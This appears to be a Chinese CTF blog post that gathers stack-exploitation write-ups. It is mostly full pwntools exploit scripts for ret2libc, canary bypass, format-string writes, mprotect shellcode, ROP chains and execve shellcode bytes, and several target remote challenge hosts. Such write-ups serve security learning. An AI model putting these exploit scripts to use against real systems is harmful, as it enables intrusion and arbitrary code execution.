---
title: Pwn栈题记录
date: 2022-05-01 22:54:59 +0800
categories:
  - 漏洞利用总结
tags:
  - pwn
  - ctf
permalink: /posts/id=17/
pin: false
published:
---

## hgame2022 enter_the_pwn_land（特别溢出GDB调试）
![image.png](https://e4l4pic.oss-cn-beijing.aliyuncs.com/img/26177342-322c75f0935f1a33.png)
![image.png](https://e4l4pic.oss-cn-beijing.aliyuncs.com/img/26177342-1dd1d641b12467ef.png)
![image.png](https://e4l4pic.oss-cn-beijing.aliyuncs.com/img/26177342-29400763b7f0fd72.png)
这里有个变量记录输入字节数，如果直接溢出会导致不能正常溢出而是一直累加，这里‘1’能绕过

```python
from pwn import *
context.log_level='debug'
rdi=0x0000000000401313
ret=0x000000000040101a
r=process('./1')
def pwn():
    libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")
    elf=ELF('./1')
    # gdb.attach(r,"b *0x4011E4")
    pay=b'1'*(0x33)+p64(rdi)+p64(elf.got['puts'])+p64(elf.plt['puts'])+p64(elf.sym['main'])
    r.sendline(pay)
    r.recvuntil('\n')
    leak=u64(r.recv(6)+b'\x00'*2)-libc.sym['puts']
    print(hex(leak))
    sys=leak+libc.sym['system']
    sh=next(libc.search(b'/bin/sh'))+leak
    #gdb.attach(r,"b *0x4011E4")
    pay=b'1'*(0x33)+p64(rdi)+p64(sh)+p64(ret)+p64(sys)
    r.sendline(pay)

pwn()
r.interactive()
```
## enter_the_evil_pwn_land(多线程溢出绕过canary)
题目和上一题一样，但添加了canary
在使用pthread时，这个TLS会被定位到与线程的栈空间相接近的位置，所以如果输入的数据过长的话也可以把这里覆盖掉，就可以改掉stack_guard的值了。从而绕过金丝雀。
相关文章
[thread stack bypass canary和sixstar ctf babystack writeup | Sakuraのblog (eternalsakura13.com)](https://eternalsakura13.com/2018/04/24/starctf_babystack/)
[starctf2018 babystack (ble55ing.github.io)](https://ble55ing.github.io/2019/07/01/starctf2018-babystack/)

```python
from pwn import *
context.log_level='debug'
context.arch="amd64"
rdi=0x0000000000401363
ret=0x000000000040101a
rsi=0x0000000000401361
bss=0x404000+0x500
levae=0x4011FF
'''
0xe6c7e execve("/bin/sh", r15, r12)
constraints:
  [r15] == NULL || r15 == NULL
  [r12] == NULL || r12 == NULL

0xe6c81 execve("/bin/sh", r15, rdx)
constraints:
  [r15] == NULL || r15 == NULL
  [rdx] == NULL || rdx == NULL

0xe6c84 execve("/bin/sh", rsi, rdx)
constraints:
  [rsi] == NULL || rsi == NULL
  [rdx] == NULL || rdx == NULL
'''
r=process('./2')
def pwn():
    libc=ELF("./libc-2.31.so")
    elf=ELF('./2')
    pay=b'\x00'*0x30+p64(bss-0x8)+p64(rdi)+p64(elf.got['puts'])+p64(elf.plt['puts'])+p64(levae)
    pay=pay.ljust(0x950,b"\x00")
    #gdb.attach(r)
    r.sendline(pay)
    #raw_input()
    r.recvuntil("\n")
    leak=u64(r.recv(6)+b'\x00'*2)-libc.sym['puts']
    print(hex(leak))
    r.sendline(b'\x00'*0x30+p64(1)+p64(leak+0xe6c81))

pwn()
r.interactive()
```
## oldecho(bss段格式化字符串)
![image.png](https://e4l4pic.oss-cn-beijing.aliyuncs.com/img/26177342-604c27ae37a7cc4f.png)
![image.png](https://e4l4pic.oss-cn-beijing.aliyuncs.com/img/26177342-72cbc22b458df0f6.png)

题目有循环的格式化字符串漏洞，在之前关掉了标准输出流，给了一个栈地址，开了沙箱。这题最后也可以leaveret栈迁移到bss，这里直接在环境变量区域写flag了。
要用orw但关闭了标准输出流

```python
from pwn import*
p = process('./oldecho')
elf = ELF("./oldecho")
libc = elf.libc
context.log_level='debug'

s       = lambda data               :p.send(data)
sa      = lambda text,data          :p.sendafter(text, str(data))
sl      = lambda data               :p.sendline(data)
sla     = lambda text,data          :p.sendlineafter(text, str(data))
r       = lambda num=4096           :p.recv(num)
ru      = lambda text               :p.recvuntil(text)
uu32    = lambda                    :u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
uu64    = lambda                    :u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
lg      = lambda name,data          :p.success(name + "-> 0x%x" % data)
## 接收栈地址
p.recvuntil("Gift: ")
stack=int(p.recvline(),16)
lg('stack',stack)
p.recvline()

# 通过调用一个函数抬一次栈,再调用一个start函数,栈上就会剩下_IO_2_1_stdou_指针
p.sendline("%"+str(stack%0x100-0x20)+"c%6$hhn")# rsp
p.sendline("%"+str(0xA90)+"c%10$hn")# rsp->__libc_start_main

stack=stack-0x110
lg('stack',stack)

# 找一个不影响程序流的地方改stdout_fileno
p.sendline("%"+str((stack+0xa0)%0x100)+"c%14$hhn")# stdout
p.sendline("%"+str(0x90)+"c%40$hhn")# stdout_fileno
p.sendline("%"+str(0x2)+"c%29$hhn")
p.recv()

# 泄露libc和bss地址
p.sendline("%13$p;%9$p;")
libc_base = int(p.recvuntil(';',drop=True),16)-libc.sym["__libc_start_main"]-240
pie = int(p.recvuntil(';',drop=True),16) # bss+48 buf
lg('pie',pie)
pop_rax=libc_base+0x3a738
pop_rdi=libc_base+0x21112
pop_rsi=libc_base+0x202f8
pop_rdx=libc_base+0x1b92
syscall=libc_base+0xbc3f5
puts = libc_base + libc.sym['puts']

payload=''
payload+=p64(pop_rax)+p64(2)+p64(pop_rdi)+p64(pie+0xb0+0x20)+p64(pop_rsi)+p64(0)+p64(pop_rdx)+p64(0)+p64(syscall)
payload+=p64(pop_rax)+p64(0)+p64(pop_rdi)+p64(1)+p64(pop_rsi)+p64(libc_base+libc.sym['environ'])+p64(pop_rdx)+p64(0x30)+p64(syscall)
payload+=p64(pop_rax)+p64(1)+p64(pop_rdi)+p64(libc_base+libc.sym['environ'])+p64(puts)
payload+='flag'

# set jmp2payload 修改程序流控制rsp及其下方
'''
0x0000000000000edd: pop rsp; pop r13; pop r14; pop r15; ret;
'''
p.sendline("%"+str((stack-0x8)%0x100)+"c%6$hhn")# 链入
p.recv()
p.sendline("%"+str(0xedd)+"c%10$hn")
p.recv()
p.sendline("%"+str((stack-0x10)%0x100)+"c%6$hhn")# 链入
p.recv()
p.sendline(("%"+str(0x3f)+"c%10$hhn").ljust(0x18,'\x00')+payload)# retn

p.interactive()
```

## pwn20220328(栈沙盒改权限)

这题读入范围较少，无法直接构造orwrop链

所以考虑写权限，把bss段权限写成7，这样就可以执行shellcode了

如果不知道远程flag名字可以多跑一边拿目录，这里直接默认flag了

![image-20220329172419755](https://e4l4pic.oss-cn-beijing.aliyuncs.com/img/image-20220329172419755.png)

结果

![image-20220329172740225](https://e4l4pic.oss-cn-beijing.aliyuncs.com/img/image-20220329172740225.png)

```python
from pwn import *
context(os='linux', arch='amd64', log_level='debug')
p=process('./shell')
elf=ELF('./shell')
libc=ELF('./libc-2.27.so')


s       = lambda data               :p.send(data)
sa      = lambda text,data          :p.sendafter(text, str(data))
sl      = lambda data               :p.sendline(data)
sla     = lambda text,data          :p.sendlineafter(text, str(data))
r       = lambda num=4096           :p.recv(num)
ru      = lambda text               :p.recvuntil(text)
uu32    = lambda                    :u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
uu64    = lambda                    :u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
lg      = lambda name,data          :p.success(name + "-> 0x%x" % data)

bss = 0x601000+0x500
read = 0x4007D4
pop_rdi=0x400863
pop_rsi=0x0000000000400861
ret = 0x0000000000400536
leave_ret = 0x4007FB
main = 0x40075D

p.recv()
pay='a'*0x20+p64(bss)+p64(pop_rdi)+p64(elf.got['puts'])+p64(elf.plt['puts'])+p64(read)
# gdb.attach(p)
p.send(pay)
p.recvuntil("let me guess\n")
base=u64(p.recv(6)+'\x00'*2)-libc.sym['puts']
lg("base",base)
open_addr = libc.sym['open']+base
read_addr = base+libc.sym["read"]
pop_rdx = base+0x0000000000001b96#pop rdx; ret;
puts = base+elf.sym['puts']

pay1 = 'a'*0x20+p64(bss+0x20)+p64(read)
p.send(pay1)

prdi_ret = 0x400863
prsi_ret = base+0x23a6a
prdx_ret = base+0x0000000000001b96
prax_ret = base+0x000000000001b500
jmp_rsp = base+0x0000000000002b25
syscall= base+0xd2625
print("jmp"+hex(jmp_rsp))
mprotect_addr = base + libc.sym['mprotect']
flag = 'flag'
payload = p64(0)+p64(prdi_ret)+p64(bss-0x500)
payload += p64(prsi_ret)+p64(0x1000)
payload += p64(prdx_ret)+p64(7)
payload += p64(prax_ret)+p64(10)
payload += p64(syscall)
payload += p64(jmp_rsp)
payload += asm('''
        mov rdi, 0; mov rsi, 0x%x;mov rdx, 0x100;mov rax, 0; syscall; push rsi; ret;
        ''' % (bss+0x100))
p.recvuntil("let me guess\n")
p.send(payload)

# cat flag
shellcode = asm(shellcraft.cat(flag))
shellcode+= asm('''
        mov rdi, 0; mov rsi, 0x%x;mov rdx, 0x100;mov rax, 0; syscall; push rsi; ret;
        ''' % (bss+0x100))
p.send(shellcode)
print(p.recvuntil("}"))


p.interactive()
```

## xman-2019-format（堆格式化字符串+爆破栈）

格式化字符串，但字符串是输入到堆上，没法溢出，所以得想办法修改eip

利用ebp链机制修改返回地址，控制eip
参考了一下2篇WP
[ [BUUCTF]PWN——xman_2019_format(堆上的fmt+爆破栈)_mcmuyanga的博客-CSDN博客](https://blog.csdn.net/mcmuyanga/article/details/115060990?utm_medium=distribute.pc_relevant.none-task-blog-2%7Edefault%7EBlogCommendFromMachineLearnPai2%7Edefault-1.control&depth_1-utm_source=distribute.pc_relevant.none-task-blog-2%7Edefault%7EBlogCommendFromMachineLearnPai2%7Edefault-1.control)
[xman_2019_format（堆fmt+爆破栈） · 语雀 (yuque.com)](https://www.yuque.com/u239977/cbzkn3/biczbd)

```python
from pwn import *
from LibcSearcher import *
from sys import argv
# context(os='linux',arch='amd64',log_level='debug')

s       = lambda data               :p.send(data)
sa      = lambda text,data          :p.sendafter(text, str(data))
sl      = lambda data               :p.sendline(data)
sla     = lambda text,data          :p.sendlineafter(text, str(data))
r       = lambda num=4096           :p.recv(num)
ru      = lambda text               :p.recvuntil(text)
uu32    = lambda                    :u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
uu64    = lambda                    :u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
lg      = lambda name,data          :p.success(name + "-> 0x%x" % data)


backdoor = 0x80485AB
for x in range (1,100):
    try:
        # p = process('./xman_2019_format')
        p = remote('node4.buuoj.cn','29254')
        payload = '%12c%10$hhn|%34219c%18$hn'
        p.sendline(payload)
        p.sendline('cat flag')
        p.recvline_contains('flag', timeout=1)
        p.interactive()
    except:
        p.close()
```

## wustctf2020_number_game(-2147483649)

int的取值范围[-2147482648,2147483647]
要绕过检查就取-2147483649即可

![image.png](https://e4l4pic.oss-cn-beijing.aliyuncs.com/img/26177342-9c1d2cd084550867.png)

## 护网杯_2018_gettingstart(0.1在内存里的表示)
就是值的覆盖，考察0.1在内存里的表示
[Double (IEEE754 Double precision 64-bit) Converter (binaryconvert.com)](http://www.binaryconvert.com/convert_double.html?decimal=048046050)

```python
from pwn import *

p=remote('node4.buuoj.cn',25052)

payload='a'*0x18+p64(0x7FFFFFFFFFFFFFFF)+p64(0x3FB999999999999A)
p.sendline(payload)
p.interactive()
```

## 强网杯2019 拟态 STKOF(拟态+静态链接rop链)
静态链接库题，和构造rop链脱不了关系
第一次做拟态题，大致就是32位和64位同时运行，共用一个payload，且结果必须相同
因为长度原因对ropchain进行了改造，注意最后有puts函数，用\x00截断

```python
# execve generated by ROPgadgetfrom struct import pack
from pwn import *
from struct import pack
rop32 = ''
rop32 += pack('<I', 0x0806e9cb) # pop edx ; ret
rop32 += pack('<I', 0x080d9060) # @ .data
rop32 += pack('<I', 0x080a8af6) # pop eax ; ret
rop32 += '/bin'
rop32 += pack('<I', 0x08056a85) # mov dword ptr [edx], eax ; ret
rop32 += pack('<I', 0x0806e9cb) # pop edx ; ret
rop32 += pack('<I', 0x080d9064) # @ .data + 4
rop32 += pack('<I', 0x080a8af6) # pop eax ; ret
rop32 += '//sh'
rop32 += pack('<I', 0x08056a85) # mov dword ptr [edx], eax ; ret
rop32 += pack('<I', 0x0806e9cb) # pop edx ; ret
rop32 += pack('<I', 0x080d9068) # @ .data + 8
rop32 += pack('<I', 0x08056040) # xor eax, eax ; ret
rop32 += pack('<I', 0x08056a85) # mov dword ptr [edx], eax ; ret
rop32 += pack('<I', 0x080481c9) # pop ebx ; ret
rop32 += pack('<I', 0x080d9060) # @ .data
rop32 += pack('<I', 0x0806e9f2) # pop ecx ; pop ebx ; ret
rop32 += pack('<I', 0x080d9068) # @ .data + 8
rop32 += pack('<I', 0x080d9060) # padding without overwrite ebx
rop32 += pack('<I', 0x0806e9cb) # pop edx ; ret
rop32 += pack('<I', 0x080d9068) # @ .data + 8
rop32 += pack('<I', 0x08056040) # xor eax, eax ; ret
rop32 += pack('<I', 0x080a8af6) # pop eax ; ret
rop32 += p32(0xb)
rop32 += pack('<I', 0x080495a3) # int 0x80

rop64 = ''
rop64 += pack('<Q', 0x0000000000405895) # pop rsi ; ret
rop64 += pack('<Q', 0x00000000006a10e0) # @ .data
rop64 += pack('<Q', 0x000000000043b97c) # pop rax ; ret
rop64 += '/bin//sh'
rop64 += pack('<Q', 0x000000000046aea1) # mov qword ptr [rsi], rax ; ret
rop64 += pack('<Q', 0x0000000000405895) # pop rsi ; ret
rop64 += pack('<Q', 0x00000000006a10e8) # @ .data + 8
rop64 += pack('<Q', 0x0000000000436ed0) # xor rax, rax ; ret
rop64 += pack('<Q', 0x000000000046aea1) # mov qword ptr [rsi], rax ; ret
rop64 += pack('<Q', 0x00000000004005f6) # pop rdi ; ret
rop64 += pack('<Q', 0x00000000006a10e0) # @ .data
rop64 += pack('<Q', 0x0000000000405895) # pop rsi ; ret
rop64 += pack('<Q', 0x00000000006a10e8) # @ .data + 8
rop64 += pack('<Q', 0x000000000043b9d5) # pop rdx ; ret
rop64 += pack('<Q', 0x00000000006a10e8) # @ .data + 8
rop64 += pack('<Q', 0x0000000000436ed0) # xor rax, rax ; ret
rop64 += pack('<Q', 0x000000000043b97c) # pop rax ; ret
rop64 += p64(0x3b)
rop64 += pack('<Q', 0x00000000004011dc) # syscall

add_esp = 0x080a8f69 # add esp, 0xc ; ret

add_rsp = 0x00000000004079d4 # add rsp, 0xd8 ; ret
p = remote('node4.buuoj.cn','26923')
payload = 'AAA'.ljust(0x110,'\x00') + p64(add_esp) + p64(add_rsp) + rop32.ljust(0xd8,'\x00') + rop64
p.sendlineafter('try to pwn it?\n',payload)
p.interactive()
```

## npuctf_2020_level2（bss段格式化字符串）
很经典的非栈上格式化字符串，最近做了好几道字符串的题，深入学习了一下，算是搞懂了
就这道题而言，先用hn输入ret地址，后续就只需要用hhn输入，减少了数据的输入量。还有就是recvuntil的小技巧，能接收大量数据。

```python
from pwn import *

p = process("./npuctf_2020_level2")
#p = remote('node4.buuoj.cn',26382)
# context.log_level = 'debug'
elf = ELF("./npuctf_2020_level2")
libc = ELF('./libc-2.27.so')

s       = lambda data               :p.send(data)
sa      = lambda text,data          :p.sendafter(text, str(data))
sl      = lambda data               :p.sendline(data)
sla     = lambda text,data          :p.sendlineafter(text, str(data))
r       = lambda num=4096           :p.recv(num)
ru      = lambda text               :p.recvuntil(text)
uu32    = lambda                    :u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
uu64    = lambda                    :u64(p.recvuntil("\x7f",timeout = 1)[-6:].ljust(8,"\x00"))
lg      = lambda name,data          :p.success(name + "-> 0x%x" % data)


def dbg():
	gdb.attach(p)

#libc leak
p.sendline('%7$p')
p.recvuntil('0x')
libc_start_main = int(p.recvuntil('\n',drop = True),16) - 0xF1
lg('libc_start_main',libc_start_main)
libc_base = libc_start_main - libc.sym['__libc_start_main']


gadgets = [0x4f2c5,0x4f322,0x10a38c]
onegadget = libc_base + gadgets[1]
lg('onegadget',onegadget)
p.sendline('%15$p')
p.recvuntil('0x')
ret_addr = int(p.recvuntil('\n',drop = True),16) - 0xD8

# low
pl = '%{}c%{}$hnxxx\x00'.format((ret_addr)&0XFFFF,9)
p.sendline(pl)
ru('xxx')
pl = '%{}c%{}$hhnxxx\x00'.format((onegadget)&0XFF,35)
p.sendline(pl)
ru('xxx')

#mid
pl = '%{}c%{}$hhnxxx\x00'.format((ret_addr+1)&0XFF,9)
p.sendline(pl)
ru('xxx')

pl = '%{}c%{}$hhnxxx\x00'.format((onegadget>>8)&0XFF,35)
p.sendline(pl)
ru('xxx')

# high
pl = '%{}c%{}$hhnxxx\x00'.format((ret_addr+2)&0XFF,9)
p.sendline(pl)
ru('xxx')
pl = '%{}c%{}$hhnxxx\x00'.format((onegadget>>16)&0XFF,35)
p.sendline(pl)
ru('xxx')

p.sendline('66666666\x00')

p.interactive()
```

## pwn2022411(数组越界+双精度数值转换)

题目一功能没有输入点，且运行后直接退出，暂时不知道如何利用

二功能有一个栈上的数组越界，但输入的值是双精度的浮点数，这个网站进行进制转换[Base Convert: IEEE 754 Floating Point](https://baseconvert.com/ieee-754-floating-point)。通过调试发现当我们输入None（python中的空值）赋值循环语句会跳过一个进行赋值，利用二功能的输出函数，使得”总分“=canary即可泄露canary(这里因为输出保留小数点后2位，而栈上的一些函数真实地址因为只有6字节，往往转换为双精度数时都是0.000000x太小了，无法泄露)

拿到canary后我们控制执行流再执行一遍泄露libc（puts->puts_got），最后写onegadget获得shell（这里exponegadget是本地的libc版本2.27-1.5的）

```python
from pwn import *
import struct
context.log_level='debug'

p=process('./pwn')

elf = ELF("./pwn")
libc=elf.libc

s       = lambda data               :p.send(data)
sa      = lambda text,data          :p.sendafter(text, str(data))
sl      = lambda data               :p.sendline(data)
sla     = lambda text,data          :p.sendlineafter(text, str(data))
r       = lambda num=4096           :p.recv(num)
ru      = lambda text               :p.recvuntil(text)
uu32    = lambda                    :u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
uu64    = lambda                    :u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
lg      = lambda name,data          :p.success(name + "-> 0x%x" % data)

def cmd(choice):
	sla("> ",choice)
# gdb.attach(p)
# leak canary
main =0x401108
cmd(2)
sla("Number of grades: ",36)
for i in range(1,34):
	sla("Grade ["+str(i)+"]: ",0)

sla("Grade [34]: ",None)

sla("Grade [36]: ",2.074507e-317)
p.recvuntil("Your new average is: ")
canary = int(p.recvuntil(".00")[:-3],10)*36
print canary

# leak libc
pop_rdi = 0x0000000000401263
puts_plt = elf.plt['puts']
lg("puts_plt",puts_plt)
puts_got = elf.got['puts']
lg("puts_got",puts_got)

sla("Number of grades: ",39)
for i in range(1,34):
	sla("Grade ["+str(i)+"]: ",0)
sla("Grade [34]: ",canary)
sla("Grade [35]: ",0)
sla("Grade [36]: ",2.074587e-317)
sla("Grade [37]: ",3.112396e-317)
sla("Grade [38]: ",2.0730836e-317)
sla("Grade [39]: ",2.0744156e-317)
# gdb.attach(p)
# sla("Grade [40]: ",None)
p.recvuntil("Your new average is: ")
p.recvuntil("\n")
libc_base = u64(p.recv(6)+'\x00'*2)-libc.sym['puts']
lg("libc_base",libc_base)
one = libc_base+0x4f2a5
lg("one",one)
one = '0000'+str(hex(one)[-12:])
print one

def hex_to_double(h):
	i = int(h,16)
	return struct.unpack('<d',struct.pack('<Q', i))[0]

one = hex_to_double(one)
print one

# getshell
cmd(2)
sla("Number of grades: ",36)
for i in range(1,34):
	sla("Grade ["+str(i)+"]: ",0)

sla("Grade [34]: ",canary)
sla("Grade [35]: ",0)
gdb.attach(p)
sla("Grade [36]: ",one)
p.interactive()
```

### 使用Python实现浮点数与基于754标准的16进制之间的转换

![image-20220412135759106](https://e4l4pic.oss-cn-beijing.aliyuncs.com/img/image-20220412135759106.png)

```python
import struct
import numpy as np

def float_to_hex(f):
	return hex(struct.unpack('<l', struct.pack('<f',f))[0])

def hex_to_float(h):
	i = int(h,16)
	return struct.unpack('<f',struct.pack("<l", i))[0]

def double_to_hex(f):
	return hex(struct.unpack('<Q', struct.pack('<d',f))[0])

def hex_to_double(h):
	i = int(h,16)
	return struct.unpack('<d',struct.pack('<Q', i))[0]

f1= np.array([17.5,-17.5,77.3,-77.3],np.float32)
f2 = np.array([17.5,-17.5,77.3,-77.3], np.float64)
h1 =[]
h2 =[]
for i in f1:
	print(float_to_hex(i))
	h1.append(float_to_hex(i))
for i in h1:
	print(hex_to_float(i))
for i in f2:
	print(double_to_hex(i))
	h2.append(double_to_hex(i))
for i in h2 :
	print(hex_to_double(i))
```

## pwn(格式化字符串/利用工具)

```python
# _*_ coding:utf-8 _*_
from pwn import *
context(arch='i386', os='linux', log_level='debug')

p = process('./sp1')
elf = ELF("./sp1")
libc = elf.libc
p = remote("123.57.69.203",7010)
def dbg():
    gdb.attach(p)

#-----------------------------------------------------------------------------------------
s       = lambda data               :p.send(data)
sa      = lambda text,data          :p.sendafter(text, str(data))
sl      = lambda data               :p.sendline(str(data))
sla     = lambda text,data          :p.sendlineafter(text, str(data))
r       = lambda num=4096           :p.recv(num)
ru      = lambda text               :p.recvuntil(text)
uu32    = lambda                    :u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
uu64    = lambda                    :u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
lg      = lambda name,data          :p.success(name + "-> 0x%x" % data)

sh_x86_18="\x6a\x0b\x58\x53\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80"
sh_x86_20="\x31\xc9\x6a\x0b\x58\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80"
sh_x64_21="\xf7\xe6\x50\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x48\x89\xe7\xb0\x3b\x0f\x05"
#https://www.exploit-db.com/shellcodes
#-----------------------------------------------------------------------------------------

sla("Can you find the magic word?",'%35$p')
p.recvuntil("0x")
libc_base = int(p.recv(8),16)-libc.sym['__libc_start_main']-241
lg('libc_base',libc_base)
printf_got = elf.got['printf']
system = libc_base+libc.sym['system']
str_bin_sh = libc.search("/bin/sh").next()+libc_base
lg("printf_got",printf_got)
lg('system',system)
lg('str_bin_sh',str_bin_sh)
systeml = system&0xff
systemh = (system>>8)&0xff
systemb = (system>>16)&0xff
lg("systeml",systeml)
lg('systemh',systemh)

pay = fmtstr_payload(6,{printf_got:system}, numbwritten=0, write_size='byte')
# dbg()
sl(pay)

sl(p32(str_bin_sh))
p.interactive()
```

